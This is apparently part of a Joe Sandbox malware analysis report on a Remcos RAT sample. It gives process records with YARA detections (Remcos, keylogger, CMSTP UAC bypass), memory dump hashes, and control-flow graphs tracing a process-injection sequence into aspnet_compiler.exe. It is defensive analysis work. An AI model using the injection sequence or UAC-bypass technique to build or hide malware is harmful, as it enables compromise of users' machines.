                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.1856200221.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.1856200221.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:15:31:19
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                        Imagebase:0x3b0000
                                                                        File size:56'368 bytes
                                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:15:31:19
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                        Imagebase:0x20000
                                                                        File size:56'368 bytes
                                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2994921734.000000000239F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:11
                                                                        Start time:15:31:19
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                        Imagebase:0x960000
                                                                        File size:56'368 bytes
                                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.1850661302.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Reset < >
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1999526835.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b620000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c46b1f800c72bff6f42bd008aef093de86bb61b897b4faa811f55c877dfd361
                                                                          • Instruction ID: 1a21aa15f37f67ca7dd3b8bc29d850b9a188aab435d99474a9895264149a10f7
                                                                          • Opcode Fuzzy Hash: 6c46b1f800c72bff6f42bd008aef093de86bb61b897b4faa811f55c877dfd361
                                                                          • Instruction Fuzzy Hash: 42824722B0EBC90FF7A69B6848656B47BE1EF56610B0A01FBD49DCB0E3D918BD05C351
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1999526835.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b620000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 00cc1ebff726e157e90691ec6c0c0adc98a3d888816067bec465765d8cfdbd5b
                                                                          • Instruction ID: 460c751044463be65fc503b362d7b030b73ae0c52dabd572b02366bdb3144d72
                                                                          • Opcode Fuzzy Hash: 00cc1ebff726e157e90691ec6c0c0adc98a3d888816067bec465765d8cfdbd5b
                                                                          • Instruction Fuzzy Hash: 9F11EB22F1F90E4BFAB8975854761BA22C2EF94710B470179E42DCB5E2DE1C7D4142C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1998863750.00007FFD9B550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B550000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b550000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction ID: 96d86082030643caafdf3750a97f0e99dee436a320208570532aafcba298bf9c
                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction Fuzzy Hash: DB01A77021CB0C4FD788EF0CE051AA6B3E0FB85320F10056DE58AC36A1D632E882CB41

                                                                          Execution Graph

                                                                          Execution Coverage:25.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:107
                                                                          Total number of Limit Nodes:7
                                                                          execution_graph 2814 e74c45 2815 e74bfb 2814->2815 2816 e74c4b Wow64SetThreadContext 2814->2816 2818 e75beb 2816->2818 2836 e75504 2837 e754bf 2836->2837 2838 e7550f CreateProcessA 2836->2838 2840 e75848 2838->2840 2840->2840 2701 e74000 2703 e74024 2701->2703 2702 e740fa 2703->2702 2706 e74d70 2703->2706 2718 e752c8 2703->2718 2708 e74d75 2706->2708 2707 e75316 2707->2702 2708->2707 2730 e75408 2708->2730 2734 e759f0 2708->2734 2738 e75c48 2708->2738 2742 e75cb0 2708->2742 2749 e75dd9 2708->2749 2753 e75de8 2708->2753 2757 e76279 2708->2757 2764 e75ff8 2708->2764 2770 e763d8 2708->2770 2720 e75092 2718->2720 2719 e75316 2719->2702 2720->2719 2721 e759f0 Wow64SetThreadContext 2720->2721 2722 e75dd9 VirtualAllocEx 2720->2722 2723 e75de8 VirtualAllocEx 2720->2723 2724 e763d8 3 API calls 2720->2724 2725 e75408 CreateProcessA 2720->2725 2726 e76279 2 API calls 2720->2726 2727 e75ff8 WriteProcessMemory 2720->2727 2728 e75cb0 2 API calls 2720->2728 2729 e75c48 ReadProcessMemory 2720->2729 2721->2720 2722->2720 2723->2720 2724->2720 2725->2720 2726->2720 2727->2720 2728->2720 2729->2720 2731 e7542c 2730->2731 2778 e74c24 2731->2778 2733 e754a6 2733->2708 2735 e75a0c 2734->2735 2737 e75a88 2735->2737 2782 e74c5c 2735->2782 2737->2708 2739 e75c65 2738->2739 2786 e74c84 2739->2786 2743 e75c67 2742->2743 2744 e75cb7 ReadProcessMemory 2742->2744 2746 e74c84 ReadProcessMemory 2743->2746 2747 e75d7e 2744->2747 2748 e75c8b 2746->2748 2747->2708 2748->2708 2750 e75de8 2749->2750 2790 e74c9c 2750->2790 2752 e75e57 2752->2708 2754 e75e0f 2753->2754 2755 e74c9c VirtualAllocEx 2754->2755 2756 e75e57 2755->2756 2756->2708 2758 e7627f WriteProcessMemory 2757->2758 2762 e76134 2757->2762 2761 e76367 2758->2761 2760 e76259 2760->2708 2761->2708 2762->2760 2794 e74d34 2762->2794 2765 e76022 2764->2765 2766 e74d34 WriteProcessMemory 2765->2766 2769 e760ab 2766->2769 2767 e76259 2767->2708 2768 e74d34 WriteProcessMemory 2768->2769 2769->2767 2769->2768 2771 e763ff 2770->2771 2772 e74d34 WriteProcessMemory 2771->2772 2773 e76464 2772->2773 2776 e76517 2773->2776 2798 e74d4c 2773->2798 2802 e74d64 2776->2802 2777 e765a1 2777->2708 2779 e75510 CreateProcessA 2778->2779 2781 e75848 2779->2781 2781->2781 2783 e74c63 Wow64SetThreadContext 2782->2783 2785 e75beb 2783->2785 2785->2737 2787 e75cb8 ReadProcessMemory 2786->2787 2789 e75c8b 2787->2789 2789->2708 2791 e75ed8 VirtualAllocEx 2790->2791 2793 e75f96 2791->2793 2793->2752 2796 e76280 WriteProcessMemory 2794->2796 2797 e76367 2796->2797 2797->2762 2799 e75b28 Wow64SetThreadContext 2798->2799 2801 e75beb 2799->2801 2801->2776 2803 e76610 ResumeThread 2802->2803 2805 e7669f 2803->2805 2805->2777 2826 e73ff0 2828 e74000 2826->2828 2827 e740fa 2828->2827 2829 e74d70 9 API calls 2828->2829 2830 e752c8 9 API calls 2828->2830 2829->2827 2830->2827 2831 e74d40 2833 e74d45 2831->2833 2832 e74cfb 2833->2832 2834 e75ba3 Wow64SetThreadContext 2833->2834 2835 e75beb 2834->2835 2819 e76609 2820 e76655 ResumeThread 2819->2820 2821 e7669f 2820->2821 2806 e74ca8 2807 e74c63 Wow64SetThreadContext 2806->2807 2809 e75beb 2807->2809 2810 e74c78 2811 e74c7d ReadProcessMemory 2810->2811 2813 e75d7e 2811->2813 2822 e74c18 2823 e74c1d CreateProcessA 2822->2823 2825 e75848 2823->2825 2825->2825
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 711ebb4c67d470c95bc8021fe2802fd7955cf8fdacbaab46d9c52e9075422307
                                                                          • Instruction ID: ffbca88ad034d31f99c16895264d0fe6cba784b9745aa9f6249af3ac330c95c8
                                                                          • Opcode Fuzzy Hash: 711ebb4c67d470c95bc8021fe2802fd7955cf8fdacbaab46d9c52e9075422307
                                                                          • Instruction Fuzzy Hash: 1B42F070902259CFDB10DF68C590A9EFBB2BF49315F19D19AD048AB212DB30ED85CFA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6dc18b81c22a0535fef7307f37fd0cd67d7778e867f2bf9d69246c584f689876
                                                                          • Instruction ID: da38238ffcb3df7ff5cce946e6c208816e63a33c5c7f700ba45745100091f395
                                                                          • Opcode Fuzzy Hash: 6dc18b81c22a0535fef7307f37fd0cd67d7778e867f2bf9d69246c584f689876
                                                                          • Instruction Fuzzy Hash: 4A426E74E01219CFDB64CFA9C984B9DBBB2FF48310F1591A9E909A7365D730AA81CF50
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2975bf137ca79ca8aab12c22f84be17ef771d7dab0cd123047c1298f1dbcf826
                                                                          • Instruction ID: 1034f2b562303971ec9ce1b91c249f45dcdc48b4a658248503dea5d78f10a48a
                                                                          • Opcode Fuzzy Hash: 2975bf137ca79ca8aab12c22f84be17ef771d7dab0cd123047c1298f1dbcf826
                                                                          • Instruction Fuzzy Hash: 0E41D6B1E006198FEB58CF6AC8517DEBBB2BFC9300F10C0AAD55CA7255EB301A858F51

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 e76279-e7627d 1 e7622f 0->1 2 e7627f-e762ef 0->2 3 e76237 1->3 6 e76306-e76365 WriteProcessMemory 2->6 7 e762f1-e76303 2->7 5 e76238-e76253 3->5 11 e76134-e7618b 5->11 12 e76259-e76260 5->12 9 e76367-e7636d 6->9 10 e7636e-e763b8 6->10 7->6 9->10 11->5 19 e76191-e761e1 call e74d34 11->19 23 e761e6-e761fa 19->23 23->3 24 e761fc-e76227 call e74850 23->24 24->1
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 00E76355
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID: (
                                                                          • API String ID: 3559483778-3887548279
                                                                          • Opcode ID: b2fa1dbce4df02d81256289c3eae900f2dd95fdad9388e42ad17a5de3ac27b90
                                                                          • Instruction ID: 7e6490c36d13ce87682517494965863319d51fe9c2b964c14a84484d0e91327d
                                                                          • Opcode Fuzzy Hash: b2fa1dbce4df02d81256289c3eae900f2dd95fdad9388e42ad17a5de3ac27b90
                                                                          • Instruction Fuzzy Hash: 4D5198B5D012589FCF10CFA9D984AEEFBF1AF59314F24A02AE818B7251D334AA45CF54

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 119 e75504-e7550d 120 e754bf-e754e0 119->120 121 e7550f-e755b3 119->121 122 e754e7-e754fc 120->122 123 e754e2 120->123 125 e75615-e75640 121->125 126 e755b5-e755e5 121->126 123->122 130 e756a2-e756fb 125->130 131 e75642-e75672 125->131 126->125 134 e755e7-e755ec 126->134 136 e756fd-e7572a 130->136 137 e7575a-e75846 CreateProcessA 130->137 131->130 144 e75674-e75679 131->144 138 e7560f-e75612 134->138 139 e755ee-e755f8 134->139 136->137 153 e7572c-e75731 136->153 162 e7584f-e75929 137->162 163 e75848-e7584e 137->163 138->125 141 e755fc-e7560b 139->141 142 e755fa 139->142 141->141 145 e7560d 141->145 142->141 147 e7569c-e7569f 144->147 148 e7567b-e75685 144->148 145->138 147->130 150 e75687 148->150 151 e75689-e75698 148->151 150->151 151->151 154 e7569a 151->154 156 e75754-e75757 153->156 157 e75733-e7573d 153->157 154->147 156->137 158 e75741-e75750 157->158 159 e7573f 157->159 158->158 161 e75752 158->161 159->158 161->156 174 e7592b-e7592f 162->174 175 e75939-e7593d 162->175 163->162 174->175 176 e75931 174->176 177 e7593f-e75943 175->177 178 e7594d-e75951 175->178 176->175 177->178 181 e75945 177->181 179 e75953-e75957 178->179 180 e75961-e75965 178->180 179->180 182 e75959 179->182 183 e75967-e75990 180->183 184 e7599b-e759a6 180->184 181->178 182->180 183->184 188 e759a7 184->188 188->188
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,038B3580,038B3584,00E754A6,?,?,?,?,?), ref: 00E75833
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: e198a962f5e6463b41027d6f5e5d0c094cb0af1c3a081a79c77f48448d468718
                                                                          • Instruction ID: 1e2e7ee83f60d99b75f83880ae34f2f83a5f5c9afc3b4ab3e1b5c6875570894e
                                                                          • Opcode Fuzzy Hash: e198a962f5e6463b41027d6f5e5d0c094cb0af1c3a081a79c77f48448d468718
                                                                          • Instruction Fuzzy Hash: FFD12671D00259CFDB14CFA8C881BEDBBF1BB59304F0091AAD959B7290DBB49A85CF91

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 189 e74c18-e755b3 193 e75615-e75640 189->193 194 e755b5-e755e5 189->194 197 e756a2-e756fb 193->197 198 e75642-e75672 193->198 194->193 201 e755e7-e755ec 194->201 203 e756fd-e7572a 197->203 204 e7575a-e75846 CreateProcessA 197->204 198->197 211 e75674-e75679 198->211 205 e7560f-e75612 201->205 206 e755ee-e755f8 201->206 203->204 220 e7572c-e75731 203->220 229 e7584f-e75929 204->229 230 e75848-e7584e 204->230 205->193 208 e755fc-e7560b 206->208 209 e755fa 206->209 208->208 212 e7560d 208->212 209->208 214 e7569c-e7569f 211->214 215 e7567b-e75685 211->215 212->205 214->197 217 e75687 215->217 218 e75689-e75698 215->218 217->218 218->218 221 e7569a 218->221 223 e75754-e75757 220->223 224 e75733-e7573d 220->224 221->214 223->204 225 e75741-e75750 224->225 226 e7573f 224->226 225->225 228 e75752 225->228 226->225 228->223 241 e7592b-e7592f 229->241 242 e75939-e7593d 229->242 230->229 241->242 243 e75931 241->243 244 e7593f-e75943 242->244 245 e7594d-e75951 242->245 243->242 244->245 248 e75945 244->248 246 e75953-e75957 245->246 247 e75961-e75965 245->247 246->247 249 e75959 246->249 250 e75967-e75990 247->250 251 e7599b-e759a6 247->251 248->245 249->247 250->251 255 e759a7 251->255 255->255
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,038B3580,038B3584,00E754A6,?,?,?,?,?), ref: 00E75833
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 9370f991c1430811bd8a6d1178e6b4fefd8284f49bd783df34aa437d46945cb6
                                                                          • Instruction ID: 397ad93077fefdfbb64218003b80c508690b0f2f753a72da375e684b079c10aa
                                                                          • Opcode Fuzzy Hash: 9370f991c1430811bd8a6d1178e6b4fefd8284f49bd783df34aa437d46945cb6
                                                                          • Instruction Fuzzy Hash: 77D11571D00259CFDB24CFA8C881BEDBBF1AB59304F0091AAD519B7290DBB49A85CF95

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 256 e74c24-e755b3 259 e75615-e75640 256->259 260 e755b5-e755e5 256->260 263 e756a2-e756fb 259->263 264 e75642-e75672 259->264 260->259 267 e755e7-e755ec 260->267 269 e756fd-e7572a 263->269 270 e7575a-e75846 CreateProcessA 263->270 264->263 277 e75674-e75679 264->277 271 e7560f-e75612 267->271 272 e755ee-e755f8 267->272 269->270 286 e7572c-e75731 269->286 295 e7584f-e75929 270->295 296 e75848-e7584e 270->296 271->259 274 e755fc-e7560b 272->274 275 e755fa 272->275 274->274 278 e7560d 274->278 275->274 280 e7569c-e7569f 277->280 281 e7567b-e75685 277->281 278->271 280->263 283 e75687 281->283 284 e75689-e75698 281->284 283->284 284->284 287 e7569a 284->287 289 e75754-e75757 286->289 290 e75733-e7573d 286->290 287->280 289->270 291 e75741-e75750 290->291 292 e7573f 290->292 291->291 294 e75752 291->294 292->291 294->289 307 e7592b-e7592f 295->307 308 e75939-e7593d 295->308 296->295 307->308 309 e75931 307->309 310 e7593f-e75943 308->310 311 e7594d-e75951 308->311 309->308 310->311 314 e75945 310->314 312 e75953-e75957 311->312 313 e75961-e75965 311->313 312->313 315 e75959 312->315 316 e75967-e75990 313->316 317 e7599b-e759a6 313->317 314->311 315->313 316->317 321 e759a7 317->321 321->321
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,038B3580,038B3584,00E754A6,?,?,?,?,?), ref: 00E75833
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: ed8231e21947d95f273c394b39b34895ca99d1f472d46440b204e43f48ce0959
                                                                          • Instruction ID: b48d970e745698aeba84abca966e7266d5f0d022c49d6d9f9e612bc65d8fbad9
                                                                          • Opcode Fuzzy Hash: ed8231e21947d95f273c394b39b34895ca99d1f472d46440b204e43f48ce0959
                                                                          • Instruction Fuzzy Hash: A9D10571D00619CFDB24CFA8C841BEDBBF1AB59304F0091A9D919B7290DBB49A85CF95

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 322 e75cb0-e75cb5 323 e75c67-e75c86 call e74c84 322->323 324 e75cb7-e75d7c ReadProcessMemory 322->324 330 e75c8b-e75c9e 323->330 328 e75d85-e75dcf 324->328 329 e75d7e-e75d84 324->329 329->328
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(00000004,?,00E75C8B,?,?), ref: 00E75D6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 6a009747dbae6934a91a048d04d4807b40e6d2ebdef9770e273b3a9c1a637815
                                                                          • Instruction ID: e4aed6344bc6fa71f32fa572ec8dd88c364c5deed12876b33c053fd7ed74ef91
                                                                          • Opcode Fuzzy Hash: 6a009747dbae6934a91a048d04d4807b40e6d2ebdef9770e273b3a9c1a637815
                                                                          • Instruction Fuzzy Hash: 7041BCB9D042589FCF10CFA9D984AEEFBF1BB49300F14906AE918B7250D375AA05CF64

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 335 e74d34-e762ef 338 e76306-e76365 WriteProcessMemory 335->338 339 e762f1-e76303 335->339 340 e76367-e7636d 338->340 341 e7636e-e763b8 338->341 339->338 340->341
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 00E76355
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 1c5fe58e25be90a4bbf5a68a7c728f03e5dde806ce36d87a483d0df2ee10e0c1
                                                                          • Instruction ID: 38679d0a354dbbbf22186619b11e5b50ecf1b5c21828796380d9aa51c03b23ae
                                                                          • Opcode Fuzzy Hash: 1c5fe58e25be90a4bbf5a68a7c728f03e5dde806ce36d87a483d0df2ee10e0c1
                                                                          • Instruction Fuzzy Hash: 014198B4D002589FCF00CFA9D984AEEFBF1BB49314F24902AE818BB251D374A944CF64

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 345 e74c45-e74c49 346 e74bfb-e74c03 345->346 347 e74c4b-e75b8c 345->347 352 e75ba3-e75be9 Wow64SetThreadContext 347->352 353 e75b8e-e75ba0 347->353 354 e75bf2-e75c36 352->354 355 e75beb-e75bf1 352->355 353->352 355->354
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00E75BD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: ce071f332c759f0d8d9fc9f110e925d289c326e4b4097b8492c850543bff121c
                                                                          • Instruction ID: 52675a7ee45da3209dd99725179bb8d52e1acd1c2c0ab82dfe53aa59f181f0dc
                                                                          • Opcode Fuzzy Hash: ce071f332c759f0d8d9fc9f110e925d289c326e4b4097b8492c850543bff121c
                                                                          • Instruction Fuzzy Hash: 2B41DBB5D053588FCB00CFAAD884AEEFBF0AB49310F14906AE418B7251D775A945CF64

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 359 e74c78-e75d7c ReadProcessMemory 363 e75d85-e75dcf 359->363 364 e75d7e-e75d84 359->364 364->363
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(00000004,?,00E75C8B,?,?), ref: 00E75D6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 03314b9b17a9223016677f51fe2838feb415ace28c8dc0023bf4339d3e4e6d3b
                                                                          • Instruction ID: c1a69101a640f372c304bfcd8942b4258f9927d696428dde7045da5d3c981967
                                                                          • Opcode Fuzzy Hash: 03314b9b17a9223016677f51fe2838feb415ace28c8dc0023bf4339d3e4e6d3b
                                                                          • Instruction Fuzzy Hash: A241B8B5C042589FCB10CFA9D984ADEFBF0BB09310F14A06AE818B7211D374A945CB64

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 368 e74c84-e75d7c ReadProcessMemory 371 e75d85-e75dcf 368->371 372 e75d7e-e75d84 368->372 372->371
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(00000004,?,00E75C8B,?,?), ref: 00E75D6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: f71a8b781e813bc5350a0310d15553f854a48470202658c75b230cd64303685c
                                                                          • Instruction ID: 015d720c48bd5b732aedd89ce4a9f0dc060cad851be2a6ee7e2f6dd165c42dc5
                                                                          • Opcode Fuzzy Hash: f71a8b781e813bc5350a0310d15553f854a48470202658c75b230cd64303685c
                                                                          • Instruction Fuzzy Hash: 1C4198B9D052589FCB10CFA9D984ADEFBF1FB09310F20A02AE918B7210D375A945CF64

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 376 e74d40-e74d49 378 e74cfb-e74d07 376->378 379 e74d4b-e75b8c 376->379 384 e75ba3-e75be9 Wow64SetThreadContext 379->384 385 e75b8e-e75ba0 379->385 386 e75bf2-e75c36 384->386 387 e75beb-e75bf1 384->387 385->384 387->386
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00E75BD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: bb05edb8a79b6e8aaf314d11b9fb07e128f69bcca5f18806dbd10b3771a9b65e
                                                                          • Instruction ID: eaee0610b8e0f68dba3232d1dbd3343a474397ca5003723518ada1bf22815676
